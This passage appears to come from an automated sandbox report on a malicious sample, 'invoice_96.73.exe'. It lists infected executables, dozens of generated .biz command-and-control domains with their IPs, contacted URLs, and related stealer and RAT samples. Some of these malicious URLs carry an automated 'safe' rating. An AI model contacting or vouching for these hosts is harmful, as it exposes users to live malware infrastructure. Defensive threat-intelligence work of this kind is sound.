      C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe100%AviraW32/Infector.Gen
      C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ADelRCP.exe100%AviraW32/Infector.Gen
      C:\MSOCache\All Users\{90140000-003D-0000-1000-0000000FF1CE}-C\ose.exe100%AviraW32/Infector.Gen
      C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\pi_brokers\64BitMAPIBroker.exe100%AviraW32/Infector.Gen
      C:\Program Files (x86)\Google\Chrome\Application\109.0.5414.120\elevation_service.exe100%AviraW32/Infector.Gen
      C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\reader_sl.exe100%Joe Sandbox ML
      C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\FullTrustNotifier.exe100%Joe Sandbox ML
      C:\MSOCache\All Users\{90140000-0115-0409-1000-0000000FF1CE}-C\DW20.EXE100%Joe Sandbox ML
      C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe100%Joe Sandbox ML
      C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe100%Joe Sandbox ML
      C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrServicesUpdater.exe100%Joe Sandbox ML
      C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\wow_helper.exe100%Joe Sandbox ML
      C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\LogTransport2.exe100%Joe Sandbox ML
      C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Eula.exe100%Joe Sandbox ML
      C:\Program Files (x86)\AutoIt3\Au3Check.exe100%Joe Sandbox ML
      C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe100%Joe Sandbox ML
      C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroTextExtractor.exe100%Joe Sandbox ML
      C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AdobeCollabSync.exe100%Joe Sandbox ML
      C:\Program Files (x86)\AutoIt3\Au3Info.exe100%Joe Sandbox ML
      C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe100%Joe Sandbox ML
      C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe100%Joe Sandbox ML
      C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\pi_brokers\32BitMAPIBroker.exe100%Joe Sandbox ML
      C:\MSOCache\All Users\{90140000-0115-0409-1000-0000000FF1CE}-C\dwtrig20.exe100%Joe Sandbox ML
      C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe100%Joe Sandbox ML
      C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe100%Joe Sandbox ML
      C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe100%Joe Sandbox ML
      C:\MSOCache\All Users\{90140000-003D-0000-1000-0000000FF1CE}-C\setup.exe100%Joe Sandbox ML
      C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\arh.exe100%Joe Sandbox ML
      C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32Info.exe100%Joe Sandbox ML
      C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroBroker.exe100%Joe Sandbox ML
      C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe100%Joe Sandbox ML
      C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ADelRCP.exe100%Joe Sandbox ML
      C:\MSOCache\All Users\{90140000-003D-0000-1000-0000000FF1CE}-C\ose.exe100%Joe Sandbox ML
      C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\pi_brokers\64BitMAPIBroker.exe100%Joe Sandbox ML
      C:\Program Files (x86)\Google\Chrome\Application\109.0.5414.120\elevation_service.exe100%Joe Sandbox ML

      Unpacked PE Files

      No Antivirus matches

      Domains

      No Antivirus matches

      URLs

      SourceDetectionScannerLabelLink
      http://18.141.10.107/bpewylwxymwihal:0%Avira URL Cloudsafe
      http://18.141.10.107/bpewylwxymwihal0%Avira URL Cloudsafe
      http://13.251.16.150/nqtlxhjrub0%Avira URL Cloudsafe

      Domains and IPs

      Contacted Domains

      NameIPActiveMaliciousAntivirus DetectionReputation
      oshhkdluh.biz
      		54.244.188.177
      		truefalse
        		high
        jpskm.biz
        		18.246.231.120
        		truefalse
          		high
          vjaxhpbji.biz
          		82.112.184.197
          		truefalse
            		high
            pywolwnvd.biz
            		54.244.188.177
            		truefalse
              		high
              ifsaia.biz
              		13.251.16.150
              		truefalse
                		high
                ytctnunms.biz
                		3.94.10.34
                		truefalse
                  		high
                  lrxdmhrr.biz
                  		54.244.188.177
                  		truefalse
                    		high
                    tbjrpv.biz
                    		34.246.200.160
                    		truefalse
                      		high
                      jhvzpcfg.biz
                      		44.221.84.105
                      		truefalse
                        		high
                        saytjshyf.biz
                        		44.221.84.105
                        		truefalse
                          		high
                          xlfhhhm.biz
                          		47.129.31.212
                          		truefalse
                            		high
                            fwiwk.biz
                            		172.234.222.143
                            		truefalse
                              		high
                              npukfztj.biz
                              		44.221.84.105
                              		truefalse
                                		high
                                przvgke.biz
                                		172.234.222.143
                                		truefalse
                                  		high
                                  dwrqljrr.biz
                                  		54.244.188.177
                                  		truefalse
                                    		high
                                    myups.biz
                                    		165.160.15.20
                                    		truefalse
                                      		high
                                      gytujflc.biz
                                      		208.100.26.245
                                      		truefalse
                                        		high
                                        yauexmxk.biz
                                        		18.208.156.248
                                        		truefalse
                                          		high
                                          ssbzmoy.biz
                                          		18.141.10.107
                                          		truefalse
                                            		high
                                            knjghuig.biz
                                            		18.141.10.107
                                            		truefalse
                                              		high
                                              yunalwv.biz
                                              		208.100.26.245
                                              		truefalse
                                                		high
                                                gnqgo.biz
                                                		18.208.156.248
                                                		truefalse
                                                  		high
                                                  deoci.biz
                                                  		18.208.156.248
                                                  		truefalse
                                                    		high
                                                    iuzpxe.biz
                                                    		13.251.16.150
                                                    		truefalse
                                                      		high
                                                      nqwjmb.biz
                                                      		35.164.78.200
                                                      		truefalse
                                                        		high
                                                        wllvnzb.biz
                                                        		18.141.10.107
                                                        		truefalse
                                                          		high
                                                          cvgrf.biz
                                                          		54.244.188.177
                                                          		truefalse
                                                            		high
                                                            qaynky.biz
                                                            		13.251.16.150
                                                            		truefalse
                                                              		high
                                                              lpuegx.biz
                                                              		82.112.184.197
                                                              		truefalse
                                                                		high
                                                                bumxkqgxu.biz
                                                                		44.221.84.105
                                                                		truefalse
                                                                  		high
                                                                  vcddkls.biz
                                                                  		18.141.10.107
                                                                  		truefalse
                                                                    		high
                                                                    acwjcqqv.biz
                                                                    		18.141.10.107
                                                                    		truefalse
                                                                      		high
                                                                      vyome.biz
                                                                      		18.246.231.120
                                                                      		truefalse
                                                                        		high
                                                                        uhxqin.biz
                                                                        		unknown
                                                                        		unknownfalse
                                                                          		high
                                                                          anpmnmxo.biz
                                                                          		unknown
                                                                          		unknownfalse
                                                                            		high
                                                                            zlenh.biz
                                                                            		unknown
                                                                            		unknownfalse
                                                                              		high
                                                                              lejtdj.biz
                                                                              		unknown
                                                                              		unknownfalse
                                                                                		high

                                                                                Contacted URLs

                                                                                NameMaliciousAntivirus DetectionReputation
                                                                                http://przvgke.biz/vccrolpmtjgefalse
                                                                                  		high
                                                                                  http://iuzpxe.biz/tgcwttfqletfhyqfalse
                                                                                    		high
                                                                                    http://ssbzmoy.biz/xuofommcmtwcsfalse
                                                                                      		high
                                                                                      http://saytjshyf.biz/ovknkfalse
                                                                                        		high
                                                                                        http://yauexmxk.biz/tgcwttfqletfhyqfalse
                                                                                          		high
                                                                                          http://oshhkdluh.biz/tgcwttfqletfhyqfalse
                                                                                            		high
                                                                                            http://lpuegx.biz/prfudbfalse
                                                                                              		high
                                                                                              http://vjaxhpbji.biz/qmufcfalse
                                                                                                		high
                                                                                                http://vcddkls.biz/nmfalse
                                                                                                  		high
                                                                                                  http://xlfhhhm.biz/pfalse
                                                                                                    		high
                                                                                                    http://cvgrf.biz/dykfalse
                                                                                                      		high
                                                                                                      http://fwiwk.biz/kbtuvbfalse
                                                                                                        		high
                                                                                                        http://jhvzpcfg.biz/tgcwttfqletfhyqfalse
                                                                                                          		high
                                                                                                          http://gytujflc.biz/aphnqtgnwfpggfalse
                                                                                                            		high
                                                                                                            http://lpuegx.biz/mfalse
                                                                                                              		high
                                                                                                              http://acwjcqqv.biz/tgcwttfqletfhyqfalse
                                                                                                                		high
                                                                                                                http://npukfztj.biz/xtaadgfalse
                                                                                                                  		high
                                                                                                                  http://bumxkqgxu.biz/tgcwttfqletfhyqfalse
                                                                                                                    		high
                                                                                                                    http://gytujflc.biz/cmjndgqtfalse
                                                                                                                      		high
                                                                                                                      http://dwrqljrr.biz/tgcwttfqletfhyqfalse
                                                                                                                        		high
                                                                                                                        http://pywolwnvd.biz/qbdegkugesfalse
                                                                                                                          		high
                                                                                                                          http://yunalwv.biz/tgcwttfqletfhyqfalse
                                                                                                                            		high
                                                                                                                            http://wllvnzb.biz/tgcwttfqletfhyqfalse
                                                                                                                              		high
                                                                                                                              http://ifsaia.biz/rkqafalse
                                                                                                                                		high
                                                                                                                                http://lrxdmhrr.biz/tgcwttfqletfhyqfalse
                                                                                                                                  		high
                                                                                                                                  http://przvgke.biz/nabdwfalse
                                                                                                                                    		high
                                                                                                                                    http://tbjrpv.biz/ebyryipvfalse
                                                                                                                                      		high
                                                                                                                                      http://vjaxhpbji.biz/webejpnbfwojkbvfalse
                                                                                                                                        		high
                                                                                                                                        http://knjghuig.biz/ydlpotfktdldcfalse
                                                                                                                                          		high
                                                                                                                                          http://deoci.biz/vhlxvykfalse
                                                                                                                                            		high
                                                                                                                                            http://gnqgo.biz/tgcwttfqletfhyqfalse
                                                                                                                                              		high
                                                                                                                                              http://fwiwk.biz/hwxehcdfalse
                                                                                                                                                		high
                                                                                                                                                http://qaynky.biz/nqtlxhjrubfalse
                                                                                                                                                  		high
                                                                                                                                                  http://ssbzmoy.biz/bpewylwxymwihalfalse
                                                                                                                                                    		high

                                                                                                                                                    URLs from Memory and Binaries

                                                                                                                                                    NameSourceMaliciousAntivirus DetectionReputation
                                                                                                                                                    http://18.141.10.107/bpewylwxymwihal:invoice_96.73.exe, 00000000.00000002.356954240.0000000000B54000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                                    		unknown
                                                                                                                                                    http://13.251.16.150/nqtlxhjrubarmsvc.exe, 00000002.00000002.620027406.000000000063C000.00000004.00000020.00020000.00000000.sdmp, armsvc.exe, 00000002.00000002.620027406.0000000000655000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                                    		unknown
                                                                                                                                                    http://schemas.xmlsoap.org/soap/encoding/armsvc.exe, 00000002.00000003.418303558.00000000020C0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                      		high
                                                                                                                                                      http://18.141.10.107/bpewylwxymwihalinvoice_96.73.exe, 00000000.00000002.356954240.0000000000B54000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                                      		unknown
                                                                                                                                                      http://schemas.xmlsoap.org/soap/envelope/armsvc.exe, 00000002.00000003.418303558.00000000020C0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                        		high
                                                                                                                                                        http://www.autoitscript.com/autoit3/Aut2exe_x64.exe.2.drfalse
                                                                                                                                                          		high
                                                                                                                                                          http://www.winimage.com/zLibDllRdrServicesUpdater.exe.2.drfalse
                                                                                                                                                            		high
                                                                                                                                                            http://www.autoitscript.com/autoit3/8armsvc.exe, 00000002.00000003.586384130.0000000001570000.00000004.00001000.00020000.00000000.sdmp, armsvc.exe, 00000002.00000003.580781457.0000000001570000.00000004.00001000.00020000.00000000.sdmp, Aut2exe_x64.exe.2.drfalse
                                                                                                                                                              		high
                                                                                                                                                              https://www.autoitscript.com/site/autoit/8armsvc.exe, 00000002.00000003.597459044.0000000001570000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                		high

                                                                                                                                                                World Map of Contacted IPs

                                                                                                                                                                • No. of IPs < 25%
                                                                                                                                                                • 25% < No. of IPs < 50%
                                                                                                                                                                • 50% < No. of IPs < 75%
                                                                                                                                                                • 75% < No. of IPs

                                                                                                                                                                Public IPs

                                                                                                                                                                IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                44.221.84.105
                                                                                                                                                                		jhvzpcfg.bizUnited States
                                                                                                                                                                		14618AMAZON-AESUSfalse
                                                                                                                                                                34.246.200.160
                                                                                                                                                                		tbjrpv.bizUnited States
                                                                                                                                                                		16509AMAZON-02USfalse
                                                                                                                                                                172.234.222.143
                                                                                                                                                                		fwiwk.bizUnited States
                                                                                                                                                                		20940AKAMAI-ASN1EUfalse
                                                                                                                                                                18.208.156.248
                                                                                                                                                                		yauexmxk.bizUnited States
                                                                                                                                                                		14618AMAZON-AESUSfalse
                                                                                                                                                                54.244.188.177
                                                                                                                                                                		oshhkdluh.bizUnited States
                                                                                                                                                                		16509AMAZON-02USfalse
                                                                                                                                                                13.251.16.150
                                                                                                                                                                		ifsaia.bizUnited States
                                                                                                                                                                		16509AMAZON-02USfalse
                                                                                                                                                                208.100.26.245
                                                                                                                                                                		gytujflc.bizUnited States
                                                                                                                                                                		32748STEADFASTUSfalse
                                                                                                                                                                47.129.31.212
                                                                                                                                                                		xlfhhhm.bizCanada
                                                                                                                                                                		34533ESAMARA-ASRUfalse
                                                                                                                                                                82.112.184.197
                                                                                                                                                                		vjaxhpbji.bizRussian Federation
                                                                                                                                                                		43267FIRST_LINE-SP_FOR_B2B_CUSTOMERSUPSTREAMSRUfalse
                                                                                                                                                                18.141.10.107
                                                                                                                                                                		ssbzmoy.bizUnited States
                                                                                                                                                                		16509AMAZON-02USfalse

                                                                                                                                                                General Information

                                                                                                                                                                Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                                Analysis ID:1564502
                                                                                                                                                                Start date and time:2024-11-28 12:11:00 +01:00
                                                                                                                                                                Joe Sandbox product:CloudBasic
                                                                                                                                                                Overall analysis duration:0h 7m 55s
                                                                                                                                                                Hypervisor based Inspection enabled:false
                                                                                                                                                                Report type:full
                                                                                                                                                                Cookbook file name:default.jbs
                                                                                                                                                                Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                                                                                                                                                                Number of analysed new started processes analysed:35
                                                                                                                                                                Number of new started drivers analysed:1
                                                                                                                                                                Number of existing processes analysed:0
                                                                                                                                                                Number of existing drivers analysed:0
                                                                                                                                                                Number of injected processes analysed:0
                                                                                                                                                                Technologies:
                                                                                                                                                                • EGA enabled
                                                                                                                                                                • AMSI enabled
                                                                                                                                                                Analysis Mode:default
                                                                                                                                                                Analysis stop reason:Timeout
                                                                                                                                                                Sample name:invoice_96.73.exe
                                                                                                                                                                Detection:MAL
                                                                                                                                                                Classification:mal100.spre.troj.evad.winEXE@18/88@39/10
                                                                                                                                                                Cookbook Comments:
                                                                                                                                                                • Found application associated with file extension: .exe

                                                                                                                                                                Warnings

                                                                                                                                                                • Exclude process from analysis (whitelisted): SearchFilterHost.exe, dllhost.exe, wmpnetwk.exe, VSSVC.exe, SearchIndexer.exe, OSE.EXE, sppsvc.exe, FlashPlayerUpdateService.exe, SearchProtocolHost.exe, WMIADAP.exe, WmiApSrv.exe, spsys.sys, mscorsvw.exe
                                                                                                                                                                • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                                • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                                                                                • Report size getting too big, too many NtOpenFile calls found.
                                                                                                                                                                • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                • Report size getting too big, too many NtSetInformationFile calls found.
                                                                                                                                                                • VT rate limit hit for: invoice_96.73.exe

                                                                                                                                                                Simulations

                                                                                                                                                                Behavior and APIs

                                                                                                                                                                TimeTypeDescription
                                                                                                                                                                06:11:49API Interceptor5575x Sleep call for process: armsvc.exe modified
                                                                                                                                                                06:11:50API Interceptor3x Sleep call for process: invoice_96.73.exe modified
                                                                                                                                                                06:11:52API Interceptor167x Sleep call for process: alg.exe modified
                                                                                                                                                                06:11:54API Interceptor394x Sleep call for process: aspnet_state.exe modified
                                                                                                                                                                06:11:59API Interceptor102x Sleep call for process: ehrecvr.exe modified
                                                                                                                                                                06:12:02API Interceptor169x Sleep call for process: ehsched.exe modified
                                                                                                                                                                06:12:03API Interceptor1x Sleep call for process: FXSSVC.exe modified
                                                                                                                                                                06:12:05API Interceptor173x Sleep call for process: ieetwcollector.exe modified
                                                                                                                                                                06:12:06API Interceptor3x Sleep call for process: svchost.exe modified
                                                                                                                                                                06:12:06API Interceptor1x Sleep call for process: maintenanceservice.exe modified
                                                                                                                                                                06:12:07API Interceptor575x Sleep call for process: msdtc.exe modified
                                                                                                                                                                06:12:08API Interceptor205x Sleep call for process: msiexec.exe modified
                                                                                                                                                                06:12:09API Interceptor26485x Sleep call for process: perfhost.exe modified
                                                                                                                                                                06:12:11API Interceptor205x Sleep call for process: snmptrap.exe modified
                                                                                                                                                                06:12:13API Interceptor166x Sleep call for process: vds.exe modified
                                                                                                                                                                06:12:18API Interceptor180x Sleep call for process: wbengine.exe modified

                                                                                                                                                                Joe Sandbox View / Context

                                                                                                                                                                IPs

                                                                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                44.221.84.105Order SMG 201906 20190816order.pdf.scr.exeGet hashmaliciousAgentTesla, MassLogger RAT, PureLog StealerBrowse
                                                                                                                                                                • hehckyov.biz/ircdert
                                                                                                                                                                C6dAUcOA6M.exeGet hashmaliciousAgentTesla, DBatLoader, PureLog StealerBrowse
                                                                                                                                                                • hehckyov.biz/xc
                                                                                                                                                                PO #09465610_GQ 003745_SO-242000846.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                                                                                • saytjshyf.biz/xyvnmtdiyfgocm
                                                                                                                                                                IBKB.vbsGet hashmaliciousAgentTesla, DBatLoader, PureLog StealerBrowse
                                                                                                                                                                • jhvzpcfg.biz/qehuuaxgtrfd
                                                                                                                                                                Ziraat_Bankasi_Swift_Mesaji_BXB04958T.cmdGet hashmaliciousAgentTesla, DBatLoader, PureLog StealerBrowse
                                                                                                                                                                • hehckyov.biz/of
                                                                                                                                                                Ziraat_Bankasi_Swift_Mesaji_DXB04958T.cmdGet hashmaliciousAgentTesla, DBatLoader, PureLog StealerBrowse
                                                                                                                                                                • hehckyov.biz/sdgvcmfo
                                                                                                                                                                8dPlV2lT8o.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                • gahyhiz.com/login.php
                                                                                                                                                                7ObLFE2iMK.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                • vocyzit.com/login.php
                                                                                                                                                                UMwpXhA46R.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                • vocyzit.com/login.php
                                                                                                                                                                1fWgBXPgiT.exeGet hashmaliciousSimda StealerBrowse
                                                                                                                                                                • gadyciz.com/login.php
                                                                                                                                                                34.246.200.160Order SMG 201906 20190816order.pdf.scr.exeGet hashmaliciousAgentTesla, MassLogger RAT, PureLog StealerBrowse
                                                                                                                                                                • pwlqfu.biz/bdggmyte
                                                                                                                                                                C6dAUcOA6M.exeGet hashmaliciousAgentTesla, DBatLoader, PureLog StealerBrowse
                                                                                                                                                                • mgmsclkyu.biz/qtbrykoecwonf
                                                                                                                                                                PO #09465610_GQ 003745_SO-242000846.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                                                                                • tbjrpv.biz/ho
                                                                                                                                                                IBKB.vbsGet hashmaliciousAgentTesla, DBatLoader, PureLog StealerBrowse
                                                                                                                                                                • tbjrpv.biz/rheljawehu
                                                                                                                                                                Ziraat_Bankasi_Swift_Mesaji_BXB04958T.cmdGet hashmaliciousAgentTesla, DBatLoader, PureLog StealerBrowse
                                                                                                                                                                • mgmsclkyu.biz/suewswdbcoj
                                                                                                                                                                Ziraat_Bankasi_Swift_Mesaji_DXB04958T.cmdGet hashmaliciousAgentTesla, DBatLoader, PureLog StealerBrowse
                                                                                                                                                                • pwlqfu.biz/mu
                                                                                                                                                                AENiBH7X1q.exeGet hashmaliciousPureLog Stealer, RedLineBrowse
                                                                                                                                                                • pwlqfu.biz/yk
                                                                                                                                                                E_dekont.cmdGet hashmaliciousDBatLoader, Nitol, PureLog Stealer, XWormBrowse
                                                                                                                                                                • mgmsclkyu.biz/xsnbcmvbhjayqro
                                                                                                                                                                Y2EM7suNV5.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                                • mgmsclkyu.biz/ailfwe
                                                                                                                                                                AsusSetup.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                • rffxu.biz/luseoc

                                                                                                                                                                Domains

                                                                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                jpskm.bizOrder SMG 201906 20190816order.pdf.scr.exeGet hashmaliciousAgentTesla, MassLogger RAT, PureLog StealerBrowse
                                                                                                                                                                • 18.246.231.120
                                                                                                                                                                C6dAUcOA6M.exeGet hashmaliciousAgentTesla, DBatLoader, PureLog StealerBrowse
                                                                                                                                                                • 34.211.97.45
                                                                                                                                                                IBKB.vbsGet hashmaliciousAgentTesla, DBatLoader, PureLog StealerBrowse
                                                                                                                                                                • 34.211.97.45
                                                                                                                                                                Ziraat_Bankasi_Swift_Mesaji_BXB04958T.cmdGet hashmaliciousAgentTesla, DBatLoader, PureLog StealerBrowse
                                                                                                                                                                • 34.211.97.45
                                                                                                                                                                Ziraat_Bankasi_Swift_Mesaji_DXB04958T.cmdGet hashmaliciousAgentTesla, DBatLoader, PureLog StealerBrowse
                                                                                                                                                                • 34.211.97.45
                                                                                                                                                                AENiBH7X1q.exeGet hashmaliciousPureLog Stealer, RedLineBrowse
                                                                                                                                                                • 34.211.97.45
                                                                                                                                                                E_dekont.cmdGet hashmaliciousDBatLoader, Nitol, PureLog Stealer, XWormBrowse
                                                                                                                                                                • 34.211.97.45
                                                                                                                                                                Y2EM7suNV5.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                                • 34.211.97.45
                                                                                                                                                                AsusSetup.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                • 34.211.97.45
                                                                                                                                                                SetupRST.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                • 34.211.97.45
                                                                                                                                                                oshhkdluh.bizOrder SMG 201906 20190816order.pdf.scr.exeGet hashmaliciousAgentTesla, MassLogger RAT, PureLog StealerBrowse
                                                                                                                                                                • 54.244.188.177
                                                                                                                                                                C6dAUcOA6M.exeGet hashmaliciousAgentTesla, DBatLoader, PureLog StealerBrowse
                                                                                                                                                                • 54.244.188.177
                                                                                                                                                                IBKB.vbsGet hashmaliciousAgentTesla, DBatLoader, PureLog StealerBrowse
                                                                                                                                                                • 54.244.188.177
                                                                                                                                                                Ziraat_Bankasi_Swift_Mesaji_BXB04958T.cmdGet hashmaliciousAgentTesla, DBatLoader, PureLog StealerBrowse
                                                                                                                                                                • 54.244.188.177
                                                                                                                                                                Ziraat_Bankasi_Swift_Mesaji_DXB04958T.cmdGet hashmaliciousAgentTesla, DBatLoader, PureLog StealerBrowse
                                                                                                                                                                • 54.244.188.177
                                                                                                                                                                AENiBH7X1q.exeGet hashmaliciousPureLog Stealer, RedLineBrowse
                                                                                                                                                                • 54.244.188.177
                                                                                                                                                                E_dekont.cmdGet hashmaliciousDBatLoader, Nitol, PureLog Stealer, XWormBrowse
                                                                                                                                                                • 54.244.188.177
                                                                                                                                                                Y2EM7suNV5.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                                • 54.244.188.177
                                                                                                                                                                AsusSetup.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                • 54.244.188.177
                                                                                                                                                                SetupRST.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                • 54.244.188.177
                                                                                                                                                                vjaxhpbji.bizOrder SMG 201906 20190816order.pdf.scr.exeGet hashmaliciousAgentTesla, MassLogger RAT, PureLog StealerBrowse
                                                                                                                                                                • 82.112.184.197
                                                                                                                                                                C6dAUcOA6M.exeGet hashmaliciousAgentTesla, DBatLoader, PureLog StealerBrowse
                                                                                                                                                                • 82.112.184.197
                                                                                                                                                                PO #09465610_GQ 003745_SO-242000846.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                                                                                • 82.112.184.197
                                                                                                                                                                IBKB.vbsGet hashmaliciousAgentTesla, DBatLoader, PureLog StealerBrowse
                                                                                                                                                                • 82.112.184.197
                                                                                                                                                                Ziraat_Bankasi_Swift_Mesaji_BXB04958T.cmdGet hashmaliciousAgentTesla, DBatLoader, PureLog StealerBrowse
                                                                                                                                                                • 82.112.184.197
                                                                                                                                                                Ziraat_Bankasi_Swift_Mesaji_DXB04958T.cmdGet hashmaliciousAgentTesla, DBatLoader, PureLog StealerBrowse
                                                                                                                                                                • 82.112.184.197
                                                                                                                                                                AENiBH7X1q.exeGet hashmaliciousPureLog Stealer, RedLineBrowse
                                                                                                                                                                • 82.112.184.197
                                                                                                                                                                E_dekont.cmdGet hashmaliciousDBatLoader, Nitol, PureLog Stealer, XWormBrowse
                                                                                                                                                                • 82.112.184.197
                                                                                                                                                                Y2EM7suNV5.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                                • 82.112.184.197
                                                                                                                                                                AsusSetup.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                • 82.112.184.197

                                                                                                                                                                ASNs

                                                                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                AKAMAI-ASN1EUfile.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                                                                                                                                • 23.44.201.7
                                                                                                                                                                Sipari#U015f_listesi.xlsGet hashmaliciousRemcos, HTMLPhisherBrowse
                                                                                                                                                                • 172.232.175.166
                                                                                                                                                                file.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                • 23.55.153.106
                                                                                                                                                                mips.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                                                                                                • 104.80.164.79
                                                                                                                                                                sh4.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                                                                                                • 23.211.108.80
                                                                                                                                                                file.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                • 23.55.153.106
                                                                                                                                                                No. I20220052.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                • 2.16.158.186
                                                                                                                                                                file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                                                                                                                                • 23.44.129.36
                                                                                                                                                                file.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                • 23.55.153.106
                                                                                                                                                                nabx86.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                • 104.80.225.102
                                                                                                                                                                AMAZON-AESUShttps://u48396839.ct.sendgrid.net/ls/click?upn=u001.6YeAQ6CJdNBv-2FudCmnBUfnGDeiTDEbkJBDYPt6L9zLs-2FLsak6B-2FHJOeuaA20CRyj4ymcnZhEANFrmmsKVXf7lykKGGim9NKe15FTuMOZuNBEFww2OP8BGALV3hzGu43iFj3whu7ElN-2FNYQWfEnFZNtXik-2Bc8xYTdlDDi-2B43g3xWfoVMN9Dsem2IaNiiX-2B-2BZ0QUoG_EefQjaPBlm3j-2F4SdpslfvAk7fHMHOXJ7LweRGvhfSEmfDfe568-2FY-2BOLHESUZOtre1SJ0b0hpgZyE9nNkk5TdPOPC4tMbl8SiWrItsarfSJPs2UVOaCUP5NH54Bsd5iepHuriwvocK8ytgM3DUdP-2FGahP9TgWP8NK8XkzPu1yHstDO59EN9oezB0Bvcj4q1reEb5SVFPJB790ukEQpDzKhgmB7njVUkFC8cDwRBiYm4JeBTEVj-2FO9L-2B-2B-2FOmACAmxhX3ZwjKn-2F44onZNgScafSE7DBg-2BaKyUPEhIs0htUoWnblk2BMfXpJIrTjI4RRPPL3aYkpTlROjrttDT-2FsPXJXV6Ht5SRUu-2B0FMc-2F6UTXOUHRIAToTaXExoh-2BhOHngBDGdH-2FjIVKS7GHuJm-2FScM7fL8YyMYHIc3ZF3zj-2FrNo1yxz6qQNvNwYKE88E7ss0Of03GH-2FJ0B8fjyNmYGjPzU42L4WTkis-2FCNDcoVJ6gJCIZpmjB42-2FzDW6h-2FUREH0NUo2OPfZ9i8VYJz7QmCHLGmxdxD04Jz41PYtN7DaspcbsjIDanjiifLEQrLEWmHGBUFW4S8xlKCRj6eGsM5ZaDHWshSLBdAzDSyuonhuBxtuYLeNVHermIaoXD85egwdLJYANewTDecNDoTikVJ8mQdl7ZtnugAlt3ha0w0KmdiGihn6nvMrhhJrSgrE-2B65pLabznZrU0JRBQYA244iDFukcakZMIzjlzqr9piWLEWATx3NZaoZsiDxjNPIcS-2BPZq07eqXM1Ulzf-2FqkjGpcDoFG-2FrwE0q08CJl0HkI1XntIga1RDU5EZi756rrs6KbGhi0n0UYyAPMzcKJ1GSCyUZR-2FjEg-2FvBTzHO-2FOloWzctFMjjbt8OJhXkQtpwpSzQ5WMHPnqPpU8mVl6-2F8VDi2j4ulsfLIYkFMQxs-2FFnpoz7jaZyont10-3DGet hashmaliciousUnknownBrowse
                                                                                                                                                                • 54.226.114.88
                                                                                                                                                                botx.mpsl.elfGet hashmaliciousMiraiBrowse
